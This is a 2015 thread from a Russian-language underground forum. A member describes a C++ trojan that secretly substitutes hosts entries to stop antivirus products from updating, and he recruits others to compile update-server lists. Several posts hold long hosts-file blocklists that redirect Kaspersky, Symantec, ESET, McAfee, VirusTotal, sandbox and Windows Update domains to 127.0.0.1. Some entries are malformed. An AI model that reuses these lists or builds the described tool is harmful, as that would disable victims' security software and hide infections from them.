1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Блокировка обновлений AV

Тема в разделе "Курилка", создана пользователем Agulzex, 21 апр 2015.

  1. TopicStarter Overlay
    Agulzex

    Agulzex

    Регистрация:
    23 окт 2012
    Сообщения:
    411
    Симпатии:
    375
    На работе что то в голову взбрело написать троян. Который будет блокировать сайты обновления AV. Погуглив почитав, что это возможно все реализовать. На работе написал на С++ программу которая из подбуфера подменяет в хосте любой сайт. Даже АВ Сервера.

    Детект 1 из 40

    Так вот. Хотел с помощью Форума сделать его более Злостным. Чтобы блокировал не ток NOD 32.
    Нужны сервера обновлений всех известных AV. Кто поможет в реализации данного проекта получит Исходник.
     
    • Like Like x 2
    Метки:
  2. TopicStarter Overlay
    Agulzex

    Agulzex

    Регистрация:
    23 окт 2012
    Сообщения:
    411
    Симпатии:
    375
    127.0.0.1 ftp.kаspеrskylab.ru
    127.0.0.1 ids.kаspеrsky-labs.com
    127.0.0.1 kаspеrsky.com
    127.0.0.1 kаspеrsky-labs.com
    127.0.0.1 liveupdate.symаntеc.com
    127.0.0.1 liveupdate.symаntеcliveupdate.com
    127.0.0.1 Please login or register to view links
    127.0.0.1 updаtе.symаntеc.com
    127.0.0.1 updаtеs.symаntеc.com
    127.0.0.1 updаtеs1.kаspеrsky-labs.com
    127.0.0.1 updаtеs1.kаspеrsky-labs.com
    127.0.0.1 updаtеs2.kаspеrsky-labs.com
    127.0.0.1 updаtеs3.kаspеrsky-labs.com



    Вот немного нашел на касперский
     
    • Like Like x 2
  3. vasenka444

    vasenka444

    Регистрация:
    19 апр 2014
    Сообщения:
    299
    Симпатии:
    202
    kaspersky.com 127.0.0.1
    updates1.kaspersky-labs.com 127.0.0.1
    Please login or register to view links 127.0.0.1
    liveupdate.symantec.com 127.0.0.1
    update.symantec.com 127.0.0.1
    virustotal.com 127.0.0.1
    virusscan.jotti.org 127.0.0.1
    anubis.iseclab.org 127.0.0.1
    threatexpert.com 127.0.0.1
    clamwin.com 127.0.0.1
    avira.com 127.0.0.1
    avg.com 127.0.0.1
    comodo.com 127.0.0.1
    mcafee.com 127.0.0.1
    safer-networking.org 127.0.0.1
    Please login or register to view links 127.0.0.1
    Please login or register to view links 127.0.0.1
    Please login or register to view links 127.0.0.1
    Please login or register to view links 127.0.0.1
    Please login or register to view links 127.0.0.1
    Please login or register to view links 127.0.0.1
    Please login or register to view links 127.0.0.1
    Please login or register to view links 127.0.0.1
    Please login or register to view links 127.0.0.1
    Please login or register to view links 127.0.0.1

    эт с поиска
     
    • Like Like x 1
  4. BloodWolf

    BloodWolf Команда форума

    Регистрация:
    29 май 2012
    Сообщения:
    424
    Симпатии:
    360
    Уже обсуждалось давно, где то был топик где много серверов.
     
    • Agree Agree x 1
  5. BoberMod

    BoberMod Временно недоступен

    Регистрация:
    11 окт 2013
    Сообщения:
    571
    Симпатии:
    539
    Please login or register to view links
    -----
     
    • Like Like x 2
  6. TopicStarter Overlay
    Agulzex

    Agulzex

    Регистрация:
    23 окт 2012
    Сообщения:
    411
    Симпатии:
    375
    сервера некоторые поменялись. нужны свежие... я думаю надо поискать все свежие сервера обновлений
     
  7. BloodWolf

    BloodWolf Команда форума

    Регистрация:
    29 май 2012
    Сообщения:
    424
    Симпатии:
    360
    еще до этой темы, была еще одна тема ))))
     
  8. TopicStarter Overlay
    Agulzex

    Agulzex

    Регистрация:
    23 окт 2012
    Сообщения:
    411
    Симпатии:
    375
    в любом случае у меня не меняет значения хостс. в винде. он подменивает его в буфере. т.е ни как нельзя будет его отследить что или кто недает обновлять АВ. тока если не удалить исполняемый файл


    Наданный момент имеется 136 баз сайтов. добавляем еще активнее ребят. Вам жетоже полезная инфа будет. И софтик который сделаю



    Код:
    127.0.0.1 www.drweb.com
    127.0.0.1 liveupdate.symantec.com
    127.0.0.1 update.symantec.com
    127.0.0.1 virusscan.jotti.org
    127.0.0.1 anubis.iseclab.org
    127.0.0.1 threatexpert.com
    127.0.0.1 clamwin.com
    127.0.0.1 avira.com
    127.0.0.1 avp.com
    127.0.0.1 ca.com
    127.0.0.1 customer.symantec.com
    127.0.0.1 dispatch.mcafee.com
    127.0.0.1 download.mcafee.com
    127.0.0.1 f-secure.com
    127.0.0.1 kaspersky.com
    127.0.0.1 kaspersky-labs.com
    127.0.0.1 liveupdate.symantecliveupdate.com
    127.0.0.1 mast.mcafee.com
    127.0.0.1 mcafee.com
    127.0.0.1 microsoft.com
    127.0.0.1 ar.atwola.com
    127.0.0.1 atdmt.com
    127.0.0.1 avp.ch
    127.0.0.1 avp.ru
    127.0.0.1 awaps.net
    127.0.0.1 click.atdmt.com
    127.0.0.1 clicks.atdmt.com
    127.0.0.1 download.microsoft.com
    127.0.0.1 downloads.microsoft.com
    127.0.0.1 engine.awaps.net
    127.0.0.1 go.microsoft.com
    127.0.0.1 msdn.microsoft.com
    127.0.0.1 my-etrust.com
    127.0.0.1 networkassociates.com
    127.0.0.1 office.microsoft.com
    127.0.0.1 phx.corporate-ir.net
    127.0.0.1 secure.nai.com
    127.0.0.1 securityresponse.symantec.com
    127.0.0.1 service1.symantec.com
    127.0.0.1 spd.atdmt.com
    127.0.0.1 support.microsoft.com
    127.0.0.1 symantec.com
    127.0.0.1 updates.symantec.com
    127.0.0.1 us.mcafee.com
    127.0.0.1 vil.nai.com
    127.0.0.1 viruslist.ru
    127.0.0.1 windowsupdate.microsoft.com
    127.0.0.1 www.avp.ch
    127.0.0.1 www.avp.com
    127.0.0.1 www.avp.ru
    127.0.0.1 www.awaps.net
    127.0.0.1 www.ca.com
    127.0.0.1 www.fastclick.net
    127.0.0.1 www.f-secure.com
    127.0.0.1 www.kaspersky.ru
    127.0.0.1 www.mcafee.com
    127.0.0.1 www.my-etrust.com
    127.0.0.1 www.nai.com
    127.0.0.1 www.networkassociates.com
    127.0.0.1 www.sophos.com
    127.0.0.1 www.symantec.com
    127.0.0.1 www.trendmicro.com
    127.0.0.1 www.viruslist.ru
    127.0.0.1 ftp://ftp.kasperskylab.ru/updates/
    127.0.0.1 ftp://ftp.avp.ch/updates/
    127.0.0.1 http://www.kaspersky.ru/updates/
    127.0.0.1 http://updates1.kaspersky-labs.com/updates/
    127.0.0.1 http://updates3.kaspersky-labs.com/updates/
    127.0.0.1 http://updates4.kaspersky-labs.com/updates/
    127.0.0.1 http://updates2.kaspersky-labs.com/updates/
    127.0.0.1 http://updates5.kaspersky-labs.com/updates/
    127.0.0.1 http://downloads1.kaspersky-labs.com/updates/
    127.0.0.1 http://www.kaspersky-labs.com/updates/
    127.0.0.1 ftp://updates3.kaspersky-labs.com/updates/
    127.0.0.1 ftp://downloads1.kaspersky-labs.com/updates/
    127.0.0.1 www3.ca.com
    127.0.0.1 ids.kaspersky-labs.com
    127.0.0.1 downloads2.kaspersky-labs.com
    127.0.0.1 downloads1.kaspersky-labs.com
    127.0.0.1 downloads3.kaspersky-labs.com
    127.0.0.1 downloads4.kaspersky-labs.com
    127.0.0.1 sophos.com
    127.0.0.1 www.viruslist.com
    127.0.0.1 viruslist.com
    127.0.0.1 www.kaspersky.com
    127.0.0.1 nai.com
    127.0.0.1 rads.mcafee.com
    127.0.0.1 trendmicro.com
    127.0.0.1 www.grisoft.com
    127.0.0.1 pandasoftware.com
    127.0.0.1 virustotal.com э
    127.0.0.1 ftp.kаspеrskylab.ru
    127.0.0.1 ids.kаspеrsky-labs.com
    127.0.0.1 kаspеrsky.com
    127.0.0.1 kаspеrsky-labs.com
    127.0.0.1 liveupdate.symаntеc.com
    127.0.0.1 liveupdate.symаntеcliveupdate.com
    127.0.0.1 www.symаntеc.com
    127.0.0.1 updаtе.symаntеc.com
    127.0.0.1 updаtеs.symаntеc.com
    127.0.0.1 updаtеs1.kаspеrsky-labs.com
    127.0.0.1 updаtеs2.kаspеrsky-labs.com
    127.0.0.1 updаtеs3.kаspеrsky-labs.com
    127.0.0.1 www.microsoft.com
    127.0.0.1 www.moneybookers.com
    127.0.0.1 www.pandasoftware.com
    127.0.0.1 www.virustotal.com
    127.0.0.1 u20.eset.com
    127.0.0.1 u21.eset.com
    127.0.0.1 u22.eset.com
    127.0.0.1 u23.eset.com
    127.0.0.1 u24.eset.com
    127.0.0.1 89.202.157.135
    127.0.0.1 89.202.157.136
    127.0.0.1 89.202.157.137
    127.0.0.1 89.202.157.138
    127.0.0.1 89.202.157.139
    127.0.0.1 u30.eset.com
    127.0.0.1 u31.eset.com
    127.0.0.1 u32.eset.com
    127.0.0.1 u33.eset.com
    127.0.0.1 u34.eset.com
    127.0.0.1 u35.eset.com
    127.0.0.1 u36.eset.com
    127.0.0.1 u37.eset.com
    127.0.0.1 u38.eset.com
    127.0.0.1 u39.eset.com
    127.0.0.1 u40.eset.com
    127.0.0.1 u41.eset.com
    127.0.0.1 u42.eset.com
    127.0.0.1 u43.eset.com
    127.0.0.1 u44.eset.com
    127.0.0.1 u45.eset.com
    127.0.0.1 u46.eset.com
    127.0.0.1 u47.eset.com
    127.0.0.1 u48.eset.com
    127.0.0.1 u49.eset.com
    
     
    • Like Like x 1
    Последнее редактирование: 21 апр 2015

Поделиться этой страницей

Загрузка...